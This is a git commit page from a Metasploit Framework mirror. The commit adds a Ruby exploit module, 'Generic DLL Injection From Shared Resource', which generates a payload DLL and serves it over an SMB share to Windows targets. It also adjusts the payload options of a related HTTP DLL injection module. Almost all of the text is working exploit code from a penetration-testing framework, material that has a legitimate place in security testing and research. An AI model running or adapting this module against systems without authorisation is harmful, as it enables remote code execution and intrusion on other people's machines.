infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #3294, @0x41414141's generic dll injection through SMB shared folder

bug/bundler_fix
jvazquez-r7 2015-03-04 16:42:24 -06:00
parent bcdf261f3b e715eaba58
commit b9a30d60d4
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
2 changed files with 72 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
modules/exploits/windows/http/generic_http_dll_injection.rb
View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Generic Web Application DLL Injection', 'Name' => 'Generic Web Application DLL Injection',
'Description' => %q{ 'Description' => %q{
This is a general-purpose module for exploiting conditions where a HTTP request This is a general-purpose module for exploiting conditions where a HTTP request
triggers a DLL load from a specified SMB share. This module serves payloads as triggers a DLL load from an specified SMB share. This module serves payloads as
DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would
trigger the load of the DLL. trigger the load of the DLL.
}, },
@ -29,6 +29,11 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => false, 'Privileged' => false,
'Arch' => [ARCH_X86, ARCH_X86_64], 'Arch' => [ARCH_X86, ARCH_X86_64],
'Stance' => Msf::Exploit::Stance::Aggressive, 'Stance' => Msf::Exploit::Stance::Aggressive,
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'References' => 'References' =>
[ [
['CWE', '427'] ['CWE', '427']

66
modules/exploits/windows/smb/generic_smb_dll_injection.rb Normal file
View File

@ -0,0 +1,66 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => 'Generic DLL Injection From Shared Resource',
'Description' => %q{
This is a general-purpose module for exploiting conditions where a DLL can be loaded
from an specified SMB share. This module serves payloads as DLLs over an SMB service.
},
'Author' =>
[
'Matthew Hall <hallm[at]sec-1.com>'
],
'References' =>
[
['CWE', '114']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => false,
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X86_64],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Targets' =>
[
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 04 2015'
))
register_options(
[
OptString.new('FILE_NAME', [ false, 'DLL File name to share (Default: random .dll)'])
], self.class)
deregister_options('FILE_CONTENTS')
end
def setup
super
self.file_contents = generate_payload_dll
self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
print_status("File available on #{unc}...")
end
end